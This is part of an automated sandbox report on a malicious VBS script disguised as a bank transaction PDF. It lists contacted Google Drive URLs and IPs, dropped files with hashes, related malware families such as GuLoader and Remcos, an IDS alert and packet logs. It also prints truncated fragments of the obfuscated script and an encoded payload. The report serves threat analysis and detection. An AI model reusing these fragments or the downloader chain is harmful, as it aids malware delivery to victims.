https://drive.usercontent.googh	powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com	powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8925000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	wab.exe, 0000000F.00000002.1635549813.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://drive.google.com	powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.1728020389.000001BCC8481000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.google.com	powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1728020389.000001BCC8481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1615676256.00000000047A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.225	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
142.250.185.238	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1507755
Start date and time:	2024-09-09 08:54:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	pko_trans_details_20240909_105339#U00b7pdf.vbs renamed because original name is a hash value
Original Sample Name:	pko_trans_details_20240909_105339pdf.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@14/9@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 65% Number of executed functions: 31 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 93.184.221.240, 88.221.110.91, 2.16.100.168
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 3452 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5504 because it is empty
Execution Graph export aborted for target wab.exe, PID 7396 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:55:01	API Interceptor	1x Sleep call for process: wscript.exe modified
02:55:04	API Interceptor	2835x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	https://go.skimresources.com/?id=129857X1600501&url=https://www.freelancer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/c16392c5-3f33-44df-b0b3-21de244d07c1?j=eyJ1IjoiNGRnZ2x2In0.IkG1h6SLHR3lrFyuSAoQTcZBzKZHtH4uVLaC9IQ4Uu8	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	Quotation-Invitation28252-09yzak_1_cdcon.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://onlinesecuritycheck.weebly.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://rakften.click/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://rdr-centru.blogspot.nl/	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://seoservicesiox.firebaseapp.com/0.08157749367335065%22%7D	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	http://abhishekch20.github.io/netflix-clone	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	http://kjkesd.godaddysites.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://pub-d32e1723091e4c74b19f3caea6a4ed0a.r2.dev/qiye-revised/index.html	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://mudassarqazihere.github.io/Neflix-Clone	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SKT ____202409_____6__.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.250.185.238 142.250.181.225
	filz.exe	Get hash	malicious	FormBook	Browse	142.250.185.238 142.250.181.225
	waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.bat	Get hash	malicious	Remcos, GuLoader	Browse	142.250.185.238 142.250.181.225
	SecuriteInfo.com.Trojan.Packed2.47861.5875.12260.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.238 142.250.181.225
	rfqlastquaterproductpurchaseorderimportlist09.bat	Get hash	malicious	GuLoader, Remcos	Browse	142.250.185.238 142.250.181.225
	Report Of Special Working Allowance (Eng) Aug 2024_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.238 142.250.181.225
	Zaplata_06092024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.238 142.250.181.225
	MV XINHONG PARTICULARS.pdf.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.238 142.250.181.225
	uD9I18eLZ6.exe	Get hash	malicious	PureLog Stealer, Raccoon Stealer v2, RedLine, zgRAT	Browse	142.250.185.238 142.250.181.225
	MARINE HONESTY VESSEL'S DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.238 142.250.181.225
37f463bf4616ecd445d4a1937da06e19	SKT ____202409_____6__.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.250.185.238 142.250.181.225
	waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.bat	Get hash	malicious	Remcos, GuLoader	Browse	142.250.185.238 142.250.181.225
	rfqlastquaterproductpurchaseorderimportlist09.bat	Get hash	malicious	GuLoader, Remcos	Browse	142.250.185.238 142.250.181.225
	s.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	142.250.185.238 142.250.181.225
	v.exe	Get hash	malicious	LummaC, Vidar	Browse	142.250.185.238 142.250.181.225
	https://ccuirsclients97224.s3.amazonaws.com/pressaclients4wp.html	Get hash	malicious	Phisher	Browse	142.250.185.238 142.250.181.225
	9l5kmTp94R.exe	Get hash	malicious	XRed	Browse	142.250.185.238 142.250.181.225
	sgf.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	142.250.185.238 142.250.181.225
	vrgeh.exe	Get hash	malicious	LummaC, Vidar	Browse	142.250.185.238 142.250.181.225
	prop-secure.b-cdn.net.ps1	Get hash	malicious	Unknown	Browse	142.250.185.238 142.250.181.225

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.2334012590155985
Encrypted:	false
SSDEEP:	6:kKPK+EtL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:3K+dDImsLNkPlE99SNxAhUe/3
MD5:	7865513E1B0F05149F183B8962DBBDCC
SHA1:	D4EB2DC6DF8905ECE849C190D603E626722B07E8
SHA-256:	49F1F64437DE1D2443B5F925967403958C190F9506B77A187270B1CFBFA9490D
SHA-512:	339E362140686E39BF843E14E1334E7E073A1187A8B64146752A55764438CD2CE0BCDD3D2080A315F3D08B11B3680CB2969BF61FF5495FE9B4E679723A1E6A2D
Malicious:	false
Preview:	p...... ...........0....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	11608
Entropy (8bit):	4.8908305915084105
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
MD5:	DD89E182EEC1B964E2EEFE5F8889DCD7
SHA1:	326A3754A1334C32056811411E0C5C96F8BFBBEE
SHA-256:	383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
SHA-512:	B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jk3voiqc.xmh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdwt1c4t.ovm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcw3c0ru.vjx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj0vrkm1.bqf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Depraves.Ter

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	473384
Entropy (8bit):	5.958054069671613
Encrypted:	false
SSDEEP:	12288:9beGWsvb+mWeA1Xj5Io4pzQlgjAEoX6JpZ6V+2jE:0GdKmWz1TyjOlaXDWhE
MD5:	FAB4848CB34A94460623A50992CD5123
SHA1:	1E1865B6C2993AA6F38B79BC1425930CC85EC72F
SHA-256:	FFF355B9B7741451CDD93E4F9E4AF51C95DB79807B0C0286AA666965A2A71EAD
SHA-512:	A08C1A7A0BC4A33B3AEFDB1550D6B0AE88851F6CB01A0C1EEBE6B64DCB854CD937D87F8D97A8171BABFD72D6B4BB32926C983C0F5A24F7B9C6AFDF5045775B71
Malicious:	false
Preview:	6wINUHEBm7tvWBoA6wKIlOsCU24DXCQE6wK/znEBm7kRtpd/cQGbcQGbgfGkbM5icQGb6wIpf4HBSyWm4usCDcRxAZvrArJ2cQGbuo2CLj9xAZtxAZtxAZvrAgXUMcrrAp66cQGbiRQL6wKDIXEBm9Hi6wIczesC9eGDwQRxAZtxAZuB+VHa/AJ8y+sCX4TrAqnFi0QkBOsCpQnrAtnWicPrAn8acQGbgcNUHpgCcQGb6wIktLpiwU3e6wJr53EBm4HqHdV/DesC7G5xAZuBwrsTMi/rAiP8cQGb6wLo1usCOlfrAhZy6wL31osMEHEBm3EBm4kME3EBm3EBm0LrAnll6wIn8YH6IAEFAHXVcQGb6wIXiolcJAzrAhnhcQGbge0AAwAA6wI8SOsC8xWLVCQI6wJFuOsCD5eLfCQE6wJJZnEBm4nrcQGb6wLG74HDnAAAAHEBm3EBm1NxAZtxAZtqQOsCs5jrAqvsievrAklj6wKDi8eDAAEAAABAGgNxAZtxAZuBwwABAABxAZtxAZtT6wJ2mHEBm4nr6wJAMusCu6eJuwQBAADrAnWZcQGbgcMEAQAAcQGbcQGbU3EBm3EBm2r/cQGb6wKuYIPCBXEBm+sCCrox9nEBm+sCHOcxyXEBm+sCbbSLGnEBm+sCyaNB6wLHUHEBmzkcCnXz6wL6fOsCrkFGcQGbcQGbgHwK+7h13esCoi7rAmxTi0QK/HEBm3EBmynw6wIpOOsCbhD/0nEBm+sCxGy6IAEFAOsCShDrAtl3McBxAZtxAZuLfCQM6wINKOsCydmBNAchKlM5cQGb6wJv2oPABOsCP4LrAvV1OdB143EBm+sCLxSJ++sCJApxAZv/13EBm3EBm0evk7DE7dZ93tWsqFdhy7iUbqzG3iSe5MSr5n3e1axoCfwJuIxurMbe5MN5BmastGXVrMZU3dfwdKO2gH/S5Z1Hq6wD9quSrkEvWbjQrfrdTKu6Y9BykP5lJ1MSS/er

Static File Info

General

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	4.978354291911082
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	pko_trans_details_20240909_105339#U00b7pdf.vbs
File size:	35'806 bytes
MD5:	f47be72a96dd07190c9636231654dfe5
SHA1:	b0f23fa8a4669111d04e442e81888330f76b5689
SHA256:	8317fc4b7eb8d40478a79de9fc539469ab5b2904822894ac6eee27f7cf9e6ce9
SHA512:	a739b342622f6949f3238b18b8c51ecbddfa61ddd6d2b18b83bff9f9b72a9c9774aca871f547ace1d41a123d756e3498babd6eb42d9b4e42f3c32e2ec91bdc56
SSDEEP:	192:oM+q8B50G4urQDIN9+H27uci5akloQROGHb0m1f8uk2R6Ct9gpCIHOmJTmFLauQ:l8Lv4urQ89mAu9YzafAGk2RnyYBPTQ
TLSH:	72F27B995B1D2D69814F33D6D0C5342CA180BD724F2023A9AF28A857DFD7A7E7508FC6
File Content Preview:	......Function Strophomenid(Fangedragterne)....Strophomenid = ChrW(Fangedragterne)....End Function ......Transithandel = 0.... ..for Materialistisk=0 to 3874241..metaforik= array(65+5+0,69,77,59,72,73,62,59,66,66)..Next..Brahma = -21464..Fradragelsen =

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-09T08:55:34.222006+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49707	142.250.185.238	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 9, 2024 08:55:06.324628115 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:06.324664116 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:06.324737072 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:06.330912113 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:06.330945969 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:06.994033098 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:06.994103909 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:06.995093107 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:06.995166063 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:07.003092051 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:07.003109932 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:07.003446102 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:07.017554998 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:07.064490080 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:07.381759882 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:07.381825924 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:07.382812023 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:07.382863045 CEST	443	49700	142.250.185.238	192.168.2.7
Sep 9, 2024 08:55:07.382930040 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:07.385797024 CEST	49700	443	192.168.2.7	142.250.185.238
Sep 9, 2024 08:55:07.401129007 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:07.401158094 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:07.401309967 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:07.401602030 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:07.401612043 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:08.034286976 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:08.034363031 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:08.037439108 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:08.037446976 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:08.037811041 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:08.039114952 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:08.080507994 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.413563967 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.413672924 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.419478893 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.419547081 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.431583881 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.431632996 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.431652069 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.431663990 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.431708097 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.440181017 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.491516113 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.499814987 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.499872923 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.499921083 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.499933958 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.501844883 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.501938105 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.501944065 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.509887934 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.509969950 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.509978056 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.514549971 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.514605999 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.514612913 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.520674944 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.520757914 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.520764112 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.527045012 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.527142048 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.527148962 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.533420086 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.533545017 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.533550978 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.543106079 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.543164015 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.543169975 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.547219038 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.547262907 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.547269106 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.551199913 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.551285028 CEST	49701	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:10.551290989 CEST	443	49701	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:10.556879044 CEST	443	49701	142.250.181.225	192.168.2.7
